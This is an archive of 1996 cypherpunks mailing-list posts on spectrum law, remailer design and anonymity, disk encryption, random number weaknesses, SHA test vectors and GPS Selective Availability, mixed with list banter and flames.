The FCC, therefore, will be unable to document >that there was an interstate radio transmission and would likely be unable >to shut you down. > >The FCC has adopted rules that permit unlicensed operation under common >circumstances when there are unlikely to be any interstate effects. Part 15 >sets forth power levels and other transmission parameters for certain >frequency bands that do not require licensing. Although the jurisdictional >basis for Part 15 has never been expressly stated, the FCC views such >transmissions as not, in any practical sense, likely to interfere with >licensed transmissions, and the unlicensed use of spectrum is conditioned on >not interfering. > >One could argue that other low-power or physically confined radio >transmissions are also unlikely to cross state lines as a practical matter, >or to interfere with licensed transmissions, and are therefore beyond the >FCC's jurisdiction. The FCC has not conceded its jurisdiction in such >cases, however. There is currently litigation ongoing regarding a >California (Berkeley, perhaps?) low-power FM station that did not obtain a >license. It doesn't interfere, and it can't be received out-of-state. Can >the FCC shut it down? Yet to be decided. > >Steve Schear also wrote: > > >Another question has to do with spectrum ownership. Prior to the '34 Act > >who owned the spectrum. Was any compensation made for the taking? > >To which Bob Jacobsen replied: > > >As to ownership of the spectrum, the spectrum still is owned by the people > >of the United States, held in public trust. So-called "sales" of spectrum > >are actually licenses to use various frequencies under different rules. > >Presumably Congress has the right to sell this "property" in the same way > >that it sells forests on public lands, but so far it has not done so.
On > >the other hand, the federal government has exacted remarkable fees for > >certain licenses: PCS operators have already put up over $17 billion in > >fees for licenses auctioned by the FCC! > >Actually, spectrum isn't "owned" by anyone, including the people of the >United States. One can't own a physical dimension such as frequency, any >more than distances, speeds, or colors. The federal government has asserted >*control* over the *use* of spectrum, however, just as it and the states >assert control over the use of particular speeds in particular locations >(e.g., 55 or 65 mph on freeways). As Bob said, the right to use spectrum, >within specifically defined geographic, frequency, power, and time limits, >is conferred by licenses awarded by the FCC. These licenses, for a >specified term, are sometimes given away to the first person who asks for >them, sometimes awarded by hearing or lottery, or, more recently, sometimes >awarded on the basis of the highest bid. The FCC isn't selling spectrum per >se, but a license for the exclusive right to use particular spectrum under >the defined terms of the license. This is very different from selling >public land, but is somewhat like selling the right to harvest the trees (or >mine the coal, or drill and pump the oil) from a piece of federal land for a >certain number of years. > > >---------------------------------------------------------------------- >Michael D. Sullivan, Bethesda, Maryland, USA >mds at access.digex.net / avogadro at well.com / 74160.1134 at compuserve.com >---------------------------------------------------------------------- > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. 
Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. "Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S. Lewis "Surveillance is ultimately just another form of media, and thus, potential entertainment." -- G. Beato From declan at eff.org Sat Sep 28 11:51:15 1996 From: declan at eff.org (Declan McCullagh) Date: Sun, 29 Sep 1996 02:51:15 +0800 Subject: quotation In-Reply-To: Message-ID: That came from a report Kenneth filed for the fight-censorship list from Paris earlier this week after his dinner conversation with U.S. OECD delegates: http://www.eff.org/~declan/global/g7-oecd/oecd_paris_cukier_092696.article I don't forward everything to cypherpunks. If you want to read the stuff, subscribe to the list: http://www.eff.org/~declan/fight-censorship/ -Declan On Sat, 28 Sep 1996, Ulf Moeller wrote: > Found in a sig file: > > "The people involved in the crypto debate are all intelligent, honorable and > pro-escrow, but they never possess more than two of these qualities at once." > -- Kenneth Neil Cukier (100736.3602 at compuserve.com) > // declan at eff.org // I do not represent the EFF // declan at well.com // From markm at voicenet.com Sat Sep 28 12:06:41 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 29 Sep 1996 03:06:41 +0800 Subject: Project Electric Potatoes [CRYPTO] In-Reply-To: <960928093843_295524911@emout08.mail.aol.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 28 Sep 1996 Scottauge at aol.com wrote: > Already we are seeing problems for speech on the internet (see radikal > postings - though they are a bit fruity IMHO.) And it sounds like the law in > one country is going to be very interested in arresting people in another. > > Hence, perhaps we need a crypto system (including human procedures and fail > safes) for community discussions.
> > Crypto is very much one to one right now, but can we implement a crypto for > wide distribution to a very defined set of people? > > This should be useful in commerce too... like CC of mail to others, etc. > > Problem Definition Time: > > Who will be responsible for allowing a member into the community? (And all > the other trust issues...) This is one of the main problems with a system like this. It would be very hard to prove that a pseudonym isn't a fed. Rather than restricting communication to just a few people, everyone should be able to participate and use a nym. This would make arrests very difficult. I think it is inevitable that the communications would eventually be leaked to a TLA. You might want to look for information on PGPdomo. This does just about everything you've described. Mark - -- PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From markm at voicenet.com Sat Sep 28 12:10:22 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 29 Sep 1996 03:10:22 +0800 Subject: Making Remailers Widespread In-Reply-To: <199609280358.UAA02589@dfw-ix4.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 27 Sep 1996, Bill Stewart wrote: > I've been thinking about how to make one-way remailers a > widespread commodity, rather than the novelty item they are today. > Doing two-way remailers would be better, but that's still a hard problem, > and I don't want to widely deploy shoddy two-way-remailers.
> > Suppose we add form-based remailer support to a popular SSL-equipped > HTTP server, such as Apache-SSL, by putting remailer.pl and a > remailer form in the default setup, which would deploy hundreds of remailers > with minimal effort. What would we have to do to make it work well, > rather than turn into a public relations disaster and spam explosion? In addition to all the points made below, security would be extremely important for a remailer cgi script. If security holes were found in the source code, it might discourage many web admins from running the script even after the hole is patched. > > - The remailer script would have to add disclaimers at the beginning > and/or end of the message reminding readers that the message is > anonymous, and to contact the remailer cabal rather than the postmaster. > > - Blocking becomes a big problem - it's annoying enough now, > when there are a small number of remailers with hard-working operators; > we'd need some sort of automated blocking support to make it > usable by relatively non-involved operators > > - A centralized block list (e.g. http://www.remailer.net/block.txt) > which all of the form-based remailers could load and reference would > allow non-picky operators not to have to handle it themselves > > - Implementing the blocking list as a web form for people who > want to be blocked would make it relatively painless to use; > remailer-operators wouldn't have to transcribe email from the > remailer-operators list to use it, which helps with other problems. Since maintaining a block list is probably one of the most time-consuming tasks involved with operating a remailer, it would be a Good Thing to add an option to the remailer cgi program to operate as a "middleman" remailer. This would only require the remailer operator to add or remove entries from a list of allowed destinations. 
The operator wouldn't have to deal with disclaimers and would only receive complaints from other operators if the remailer is malfunctioning in some way. [...] > Technical question: > - How do we initiate an http or https PUT from a script? > I assume there's probably some perl add-in for posting http/https? > Is there a command-line-shell interface that can fetch URLs? I don't know if any perl modules or *.ph files exist that implement http/https. Http should be pretty easy, but https would require SSL code. I think there are perl modules that contain crypto functions, so https could use the functions provided in the module. Netcat can be used pretty easily to fetch URLs (e.g. echo "GET /foobar.html HTTP/1.0" | nc www.webserver.com 80). This will print out the HTML files and corresponding MIME headers on stdout. Mark - -- PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From markm at voicenet.com Sat Sep 28 12:26:41 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 29 Sep 1996 03:26:41 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 28 Sep 1996, Jüri Kaljundi wrote: > A program called F-Secure Desktop for Windows 3.x and Windows 95 is using > Blowfish with 256-bit keys. It is meant for encrypting the files on your > hard disk and it works nicely together with Windows File Manager or > Windows95 shell.
I would say it is one of the best strong and easy to use > HD encryption programs (only that it costs $$). > > It is manufactured by Datafellows, who is also distributing F-Secure SSH. > You can download the demo version at http://www.datafellows.com/f-secure/ > > Why they are using it: may be because it is fast on Intel Pentium and > Pentium Pro processors, as discussed in Applied Cryptography? Blowfish is unpatented and the source code doesn't have any restrictions. If they used something like IDEA, they would have to pay for a license. I don't know if Blowfish is faster than 3DES, but if it isn't, then I have no idea why they would use Blowfish. Mark - -- PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From tcmay at got.net Sat Sep 28 12:30:43 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 29 Sep 1996 03:30:43 +0800 Subject: Mousepad RNG's? In-Reply-To: <199609281551.IAA03203@dns2.noc.best.net> Message-ID: At 8:13 PM -0700 9/27/96, James A. Donald wrote: >Some time ago, at a cypherpunks conference, people were making >all sorts of ridiculous proposals for being really, really, >really, sure that you had real entropy, and a prominent >cypherpunk, possibly Tim May, said, "This is ridiculous: >Nobody ever broke good crypto through weakness in the >source of truly random numbers". Sometime after that >Netscape was broken through weakness in the source of >truly random numbers.
This somewhat misrepresents what I said, back at that Cypherpunks meeting in 1993-4. The Netscape "random number generator" that was the basis of the Goldberg and Wagner attack was not even remotely a _physical_ random number generator, as it relied on various Unix clock readings and not on any physical sources of entropy (such as mouse tracks, Johnson noise, radioactivity, etc.). It was a classic case of living in a state of sin. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Sat Sep 28 12:53:56 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 29 Sep 1996 03:53:56 +0800 Subject: crypto anarchy vs AP Message-ID: <199609281729.KAA05451@mail.pacifier.com> At 02:06 PM 9/26/96 -0500, snow wrote: >Mr. Beck said: >> Been reading the AP thread, and thought I'd donate some of my views. > >> the Internet. You'd just cause the government to panic, and this >> would have negative effects, it would take ages for them to calm down, >> and the laws they'd pass in the mean time would mean a near certainty >> of mandatory GAK as a condition to switching the Internet back on. >> (Before someone takes me to task for the impossibility of switching >> the Internet off, it all depends on the level of government panic. >> More specifically perhaps they would disconnect key backbones, and >> ISPs briefly while they rushed into effect a few presidential decrees >> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, >> etc.) > > This would be cutting their own throats. 
There is SO much commercial >and government traffic going across "The Net" that many businesses would >scream bloody murder, and the government would have MASSIVE trouble with >its agenda. Yes, that "they'll cut off the Internet!" talk doesn't seem to be very practical. Society very quickly develops dependency on inventions. Try to take away their computers and they'd scream; take away their telephone and it'd be worse! Give Internet another couple of years and 50% of big business would be severely impacted should it be cut off. Wait five years and the world would practically stop rotating without Internet. On a related issue, GPS (global-positioning system) contains a de-accurizing mis-feature called S/A, which adds a little error to the location as detected by a receiver. Ostensibly, it was added so that this could be turned on in wartime, to deny the enemy the ability to make 10-meter fixes. Turns out that it was kept on all the time, probably because if it WASN'T it would become politically impossible to de-accurize the system even in wartime. Jim Bell jimbell at pacifier.com From zachb at netcom.com Sat Sep 28 13:48:46 1996 From: zachb at netcom.com (Z.B.) Date: Sun, 29 Sep 1996 04:48:46 +0800 Subject: [CRYPTO] (was: sig/noise ratio) In-Reply-To: <324CBFD1.6BCB@popd.ix.netcom.com> Message-ID: On Fri, 27 Sep 1996, Patricia Gibbons wrote: > > In the interest of those who wish a significant increase in the > > signal/noise ratio I make a proposal. Significant crypto related > > posts could be prefaced with [CRYPTO] on the subject line on a > > strictly volunteer basis, that way those desiring a more topical > > list could have one simply by setting the appropriate filter. > > > > Items crypto related but missing the [CRYPTO] header could be > > reposted by well meaning souls. > > > > Other appropriate headers could of course be used. > > > > Brian > Sounds like a good idea, but what do you define as "significant crypto"?
Also, what's to stop the anonymous idiot and several other well-known list.idiots from doing the same? Zach Babayco zachb at netcom.com <-------finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 ----- If you need to know how to set up a mail filter or defend against emailbombs, send me a message with the words "get helpfile" (without the " marks) in the SUBJECT: header. I have several useful FAQ's and documents available. From ponder at freenet.tlh.fl.us Sat Sep 28 14:29:58 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Sun, 29 Sep 1996 05:29:58 +0800 Subject: [CRYPTO], or hash, anyway Message-ID: I need a copy of the appendix to the SHA FIPS pub (180-1?) that has the three test texts and corresponding SHA hashes, so that I can test an SHA implementation I'm working with. I have tried the NIST site, and can't seem to get through. If anybody has this test deal, or knows where it is out there on the net somewhere, please let me know. Thanks in advance. (My problem is I keep getting different hashes between an MS-DOS version I'm running and one running on a Linux box, when I ftp the same files back and forth. @#$%. I thought maybe I was having problems with some kind of Line-feed vs. Carriage Return/Line-feed conversion deal, but it also generates different hashes on binary files. So I thought I would test the Linux and the DOS one against the specs in the FIPS, and see which one is hosed up.) -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ to unsubscribe, send to majordomo at toad.com a message that reads: unsubscribe cypherpunks in the message body, not the SUBJECT: line. -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ From cvhd at indyweb.net Sat Sep 28 14:50:00 1996 From: cvhd at indyweb.net (cvhd at indyweb.net) Date: Sun, 29 Sep 1996 05:50:00 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! 
Message-ID: <3.0b26.32.19960928144259.006a5f48@indyweb.net> >A program called F-Secure Desktop for Windows 3.x and Windows 95 is using >Blowfish with 256-bit keys. It is meant for encrypting the files on your >hard disk and it works nicely together with Windows File Manager or >Windows95 shell. I would say it is one of the best strong and easy to use >HD encryption programs (only that it costs $$). Yes, but how "safe" is a 256-bit key with blowfish? Would it withstand the efforts of big bro' ? From ponder at freenet.tlh.fl.us Sat Sep 28 14:55:08 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Sun, 29 Sep 1996 05:55:08 +0800 Subject: [NOISE, was CRYPTO], or hash, anyway Message-ID: Please disregard earlier message about finding copy of the SHA document: FIPS PUB 180-1, I found it at: http://bilbo.isu.edu/security/isl/fip180-1.html Thanks, anyway. From stewarts at ix.netcom.com Sat Sep 28 15:22:18 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 06:22:18 +0800 Subject: EFF Distributes Terrorist Information On Internet - Wiretaps Needed!! :-) Message-ID: <199609282010.NAA27339@dfw-ix3.ix.netcom.com> The recent electronic newsletter of that suspicious organization calling itself the EFF contains terrorist material: > Received: (from daemon at localhost) by eff.org (8.7.5/8.6.6) id QAA17422 for > effector-comc-exploder; Fri, 27 Sep 1996 16:57:26 -0700 (PDT) > ^^^^^^^^^^^^^^^^^^^^^^ Comic exploders? How totally un-American. They must be stopped! Because a MIME is a terrible thing to waste.... 
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dlv at bwalk.dm.com Sat Sep 28 15:29:32 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 06:29:32 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: jim bell writes: > On a related issue, GPS (global-positioning system) contains a de-accurizing > mis-feature called S/A, which adds a little error to the location as > detected by a receiver. Ostensibly, it was added so that this could be > turned on in wartime, to deny the enemy the ability to make 10-meter fixes. > Turns out that it was kept on all the time, probably because if it WASN'T it > would become politically impossible to de-accurize the system even in wartime Two funny rumors: 1. Supposedly the DoD users of GPS have access to the accurate positioning information at all times. (Not sure how this works - the accurate data is encrypted?) During the Iraq war in '93 they didn't have enough equipment to take advantage of this, so they turned off the S/A and gave everyone (including the military users) accurate GPS on commercially available GPS eq. Then they turned it back on. 2. The DoD is doing a study right now on how to make GPS useless to the enemy at wartime. I think figuring out a way to turn off A/S and getting accurate GPS on commercial equipment at all times would make a nifty Cypherpunks project - if it really involves breaking some encryption.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 28 15:41:03 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 06:41:03 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis In-Reply-To: <199609281833.EAA04360@suburbia.net> Message-ID: Julian Assange writes: > > I am looking for one or more people (or firms) who are qualified to perform > > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com > > call in the U.S. at +1 408.479.7874 > > > > Jack Oswald > > > > Find your father's little black book under the couch? Well, I dialed the number out of curiosity (it's in San Diego). The answering machine says "This is Jack Oswald with R.P.K." Sounds gay. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mech at eff.org Sat Sep 28 16:42:11 1996 From: mech at eff.org (Stanton McCandlish) Date: Sun, 29 Sep 1996 07:42:11 +0800 Subject: EFF Distributes Terrorist Information On Internet - Wiretaps In-Reply-To: <199609282010.NAA27339@dfw-ix3.ix.netcom.com> Message-ID: <199609282106.OAA25388@eff.org> > The recent electronic newsletter of that suspicious organization > calling itself the EFF contains terrorist material: > > Received: (from daemon at localhost) by eff.org (8.7.5/8.6.6) id QAA17422 for > > effector-comc-exploder; Fri, 27 Sep 1996 16:57:26 -0700 (PDT) > > ^^^^^^^^^^^^^^^^^^^^^^ > > Comic exploders? How totally un-American. They must be stopped! > > Because a MIME is a terrible thing to waste.... Heh. If anyone's genuinely curious, the EFFector list is big enough that we have it split by domain, and then by letter. effector-comc-exploder is a script that "explodes" EFFector to all the *@[*.]c*.com addresses on the list. :) -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Program Director From nobody at cypherpunks.ca Sat Sep 28 16:43:12 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sun, 29 Sep 1996 07:43:12 +0800 Subject: [CRYPTO] Labeling messages Message-ID: <199609282105.OAA10791@abraham.cs.berkeley.edu> Fart fart fart fart TWA 800 fart fart fart. Tim May fart fart AP fart Taxes fart fart fart. Fart. From gcg at pb.net Sat Sep 28 17:50:13 1996 From: gcg at pb.net (Geoffrey C. Grabow) Date: Sun, 29 Sep 1996 08:50:13 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <3.0b15.32.19960928181545.006a6214@mail.pb.net> Would it be a good idea to have a re-mailer "randomly" decide whether to send the mail to the destination or to another re-mailer. If all re-mailers performed this way, not even the sender would know the path. The chain could be short sometimes and long others. Granted, there is a possibility that every mailer decides to chain instead of sending the message to the recip, but some clever counter tag could keep the number of links to a certain maximum. The "randomness" of this would aid in traffic analysis, and of course each mailer that decides to chain the mail would encrypt under the next mailer's pub key. Any thoughts? G.C.G. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Geoffrey C. Grabow | Great people talk about ideas. | | Oyster Bay, New York | Average people talk about things. | | gcg at pb.net | Small people talk about people. | |----------------------------------------------------------------------| | PGP 2.6.2 public key available at http://www.pb.net/~wizard | | and on a plethora of key servers around the world. | | Key ID = 0E818EC1 | | Fingerprint = A6 7B 67 D7 E9 96 37 7D E7 16 BD 5E F4 5A B2 E4 | |----------------------------------------------------------------------| | That which does not kill us, makes us stranger. 
- Trevor Goodchild | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From stewarts at ix.netcom.com Sat Sep 28 18:00:12 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 09:00:12 +0800 Subject: Public Schools [NOISE] Message-ID: <199609282255.PAA05134@dfw-ix3.ix.netcom.com> attila: >= .> a very unusual situation --but I live in rural southern >= .> utah where the regional middle school of 1200 can support 4 >= .> bands, the top 2 being very impressive, and provide full AP >= .> classes, and ACT Tim: >= .Wow! Utah is teaching AP? Is Jim Bell being brought in as a >= .Special Lecturer? attilla > come on, Tim... you are not that old. AP has three meanings > (at least): > 1. Associated Press (news gathering) > 2. Advanced Placement (as in college credit for HS classes) > 3. not widely known: Jim Bell's Assassination Political Hey, if a high school can teach kids to read the Associated Press critically and think about what it's saying and means, they're doing a really fine job! For that matter, if they can teach kids to just read the news at all, they're accomplishing something. I was surprised by the idea of teaching Advanced Placement classes in a middle school - in the reasonably high-quality public school I went to, most of the AP classes were taken by 12th graders and a few by 11th-graders, though this was partly because that's when we started getting slack in our schedules after taking the regular courses. 
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From backdraft at earthlink.net Sat Sep 28 18:13:24 1996 From: backdraft at earthlink.net (Back Draft) Date: Sun, 29 Sep 1996 09:13:24 +0800 Subject: No Subject Message-ID: desubscribe From dlv at bwalk.dm.com Sat Sep 28 18:16:38 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 09:16:38 +0800 Subject: Igor Chudov's cypherpunks felony admission turned over to the appropriate authorities Message-ID: Yo C'punks, check this out: >Path: ...!newsfeed.internetmci.com!news.sgi.com!enews.sgi.com!news.mathworks.com!news.sprintlink.net!news-peer.sprintlink.net!arclight.uoregon.edu!netnews.worldnet.att.net!uunet!news-in2.uu.net!news1.gte.net!usenet >From: netscum at gte.net >Newsgroups: news.admin.net-abuse.misc,soc.culture.russian >Subject: Chudov's published felony admission turned over to Commerce >Date: Fri, 27 Sep 1996 03:16:06 GMT >Organization: GTE Intelligent Network Services, GTE INS >Sender: netscum at gte.net >Distribution: Worldwide Net Scum >Message-ID: <324b43fa.476946222 at news.gte.net> >Reply-To: yourself at netscum.org > >Igor Chudov's published admission of his willful and purposeful violation >of ITAR laws (a criminal felony offense according the United States Code) >has been turned over to the appropriate investigators at the Department of >Commerce in Washington, D.C., who expressed interest in this incident, >particularly because of the additional contributing factor of Chudov's visa >status being under active investigation by the Department of Justice, >Immigration and Naturalization Service. Chudov's very bad example serves >notice on the many netscum reading this article that "crime does not pay." Also check out NetScum's home page at http://home1.gte.net/netscum. 
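Geoffrey C. Grabow's proposal earlier in this archive (each remailer randomly chooses between delivering and chaining, with a counter tag capping the number of links) can be modelled to see what chain lengths it actually produces. The following is an added example, not code from any poster or remailer package. The remailer names, the forwarding probability `p_chain` and all function names are assumptions, and the per-hop re-encryption is left out because it does not affect path length.

```python
"""Model of the random-chaining remailer proposal (added example)."""
import random
from collections import Counter

# Hypothetical remailer names; the proposal names none.
REMAILERS = ["alpha", "bravo", "charlie", "delta", "echo"]


def route(first_hop, p_chain, max_links, rng):
    """Return the remailers one message passes through, in order.

    Each remailer flips a biased coin: with probability p_chain it chains
    to another remailer, otherwise it delivers. The counter tag is modelled
    by the path length and forces delivery once max_links is reached.
    """
    path = [first_hop]
    while len(path) < max_links and rng.random() < p_chain:
        # Chain to any remailer other than the one holding the message.
        path.append(rng.choice([r for r in REMAILERS if r != path[-1]]))
    return path


def length_distribution(p_chain, max_links):
    """Exact probability of each chain length (a truncated geometric)."""
    dist = {k: p_chain ** (k - 1) * (1 - p_chain) for k in range(1, max_links)}
    # Everything that would have chained further is cut off at the cap.
    dist[max_links] = p_chain ** (max_links - 1)
    return dist


def expected_length(p_chain, max_links):
    """Mean number of remailers a message passes through."""
    dist = length_distribution(p_chain, max_links)
    return sum(k * pr for k, pr in dist.items())


def simulate(n, p_chain, max_links, seed=1996):
    """Route n messages and summarise what the operators get to see."""
    rng = random.Random(seed)
    lengths = Counter()
    same_endpoint = 0
    for _ in range(n):
        path = route(rng.choice(REMAILERS), p_chain, max_links, rng)
        lengths[len(path)] += 1
        # The first hop sees the sender, the last hop sees the recipient.
        if path[0] == path[-1]:
            same_endpoint += 1
    return {
        "lengths": lengths,
        "mean": sum(k * c for k, c in lengths.items()) / n,
        # Chains of one link: a single remailer knows sender and recipient.
        "single_hop": lengths[1] / n,
        # Same operator handles both the entry and the exit of the chain.
        "same_endpoint": same_endpoint / n,
    }


if __name__ == "__main__":
    for p in (0.5, 0.8, 0.9):
        result = simulate(20000, p, max_links=6)
        print(f"p_chain={p}: mean links {result['mean']:.2f} "
              f"(exact {expected_length(p, 6):.2f}), "
              f"single-hop {result['single_hop']:.1%}, "
              f"same entry/exit operator {result['same_endpoint']:.1%}")
```

The counter tag bounds the longest chain, but nothing in the scheme bounds the shortest: a fraction `1 - p_chain` of messages is delivered by the first remailer, which then knows both sender and recipient.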
From mixmaster at remail.obscura.com Sat Sep 28 19:17:02 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Sun, 29 Sep 1996 10:17:02 +0800 Subject: [NOT NOISE] Jena Remailer Message-ID: <199609282310.QAA19716@sirius.infonex.com> wmono at Direct.CA wrote to All: w> My appologies in advance to the list for this noise. Dear Anonymous, w> if there is another way to contact you, please let it be known so that w> this need not involve the 1500 others on the list. Noise? Are you on drugs? This is one of the relatively few _on-topic_ threads on this damned list these days! If 1500 other folks can be made to give a try to the Jenaer Remailer then this thread has served a very useful and salutary purpose. >> 4: Account is automatically established and should work >> immediately. w> As soon as the mail arrives, that is correct. If it was lost by using w> a non-operational remailer, or by sending a misformatted mail, then it w> will not. I believe this was the problem; several of the remailers were choking right when I was doing this experiment. Indeed, I had to post my reply to you here FOUR times through otherwise reliable remailers before it ever showed up. w> It may be lag, it may not be. I recommend that you create a test nym, w> with minimal anonymity (no remailers, send everything directly to w> jena) and, after waiting several hours to ensure that the key was w> added, send a mail from your nym to your own account. If you get no w> mail after several hours, something is wrong. This is mechanically a sound suggestion, but I believe that it is a primary security measure to avoid any direct contact with fresh remailer, even using a waste account. >> w> - Never request a delivery to your real Email address. >> So here's what I really want to know: When/if the new account is up >> and running, how _does_ one discreetly retrieve his mail? 
I don't >> see how, other than to have it sent to alt.anonymous.messages via a >> mail2news netmail address such as >> alt.anonymous.messages at news.demon.co.uk and then pick through the >> mess there until some cyphertext message responds to his right key. w> That's exactly right. We need better message pools. Actually, what w> is needed is a email message pool, because of the lag and uncertainly w> of Usenet. But that's a project for another day. >From a security standpoint, to say nothing of the netmail load, I should prefer not to use an e-mail pool, but the daunting load of spam and clueless messages in a.a.m is a nuisance, and you are surely right about the vagaries of Usenet connectivity. My first thought was to have them sent to a non-autopinging *.test ng via a well-tested parsing mail2news gate, but some autopingers ping ALL *.test traffic passing through a site. If these ping messages didn't get automatically bitbucketed at the remailer site, this could be a problem for the operator. Anyway, let's see what happens with today's tests... From dthorn at gte.net Sat Sep 28 19:51:45 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 29 Sep 1996 10:51:45 +0800 Subject: Crypto and six yr old sex perverts: Project Electric Potatoes [CRYPTO] In-Reply-To: <960928093843_295524911@emout08.mail.aol.com> Message-ID: <324DC2AB.3CE8@gte.net> Scottauge at aol.com wrote: > Using crypto may be required to keep ya outta jail, given the > guberment has gone so far low as to "route out this six year old sex > pervert busy kissing the girls." (Quoted for emphasis.) > I wonder when sexual harassment will become a sex offence. Are the > red sashed sex cores of Orwell's 1984 around the corner? [remaining text and technical-related discussion deleted] This post is a perfect example of why you'd need a comprehensive definition of how to use the "[CRYPTO]" string in subject headers. Could I suggest: 1. 
[CRYPTO] at the extreme left for actual technical discussion (with examples and math, probably). 2. [CRYPTO] elsewhere in the subject line, to indicate crypto technically-related discussion without examples and math, as in the end of the Project Electric Potatoes posting. 3. [CRYPTO] nowhere in the subject line for all else. From dsmith at prairienet.org Sat Sep 28 20:29:56 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sun, 29 Sep 1996 11:29:56 +0800 Subject: Mousepad RNG's? Message-ID: <199609290112.UAA17712@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: jamesd at echeque.com, cypherpunks at toad.com Date: Sat Sep 28 20:04:39 1996 > Netscape was broken through weakness in the source of > truly random numbers. No, it wasn't. Netscape was broken because their random numbers (really pseudorandom) were chosen from very poor sources (on Unix boxes, pid and ppid, maybe even the system clock :) dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From snow at smoke.suba.com Sat Sep 28 21:51:46 1996 From: snow at smoke.suba.com (snow) Date: Sun, 29 Sep 1996 12:51:46 +0800 Subject: Public Schools In-Reply-To: <199609280353.VAA23910@InfoWest.COM> Message-ID: <199609290153.UAA00354@smoke.suba.com> A person going by the name Attila said: > = . There is a solution. Trade Schools, > The problem was simple: we have only the now retiring > toolmakers who make it all possible. engineering graduates will > not observe the manufacturing floors since it is above their > dignity to roll of their sleeves. I knew too many engineering students to believe this. I knew one (Civil Engineering) who had been a Paramedic, he wanted grease and dirt on his hands, it may be harder to wash off, but much easier to sleep off. > if engineers were required to serve internships in the shops, > as doctors are required to intern in a hospital (and the really > good ones, the top of the class, choose what I call meat-wagon > wards (large city ER and trauma units), the U.S. would be a far > healthier and competitive environment. No argument there. > I know, why the meat wagon wards with their pressure and > unreasonable hours? experience, anything and everything > comes through those doors every night, and it goes off the scale > on the weekends... Hell, that desciribes the ER I used to work in, and it was in a college town. (Yes, I do have a sorted job history. Everything from a strip joint dj. to working as a designer for a Big 7 Accounting firm). 
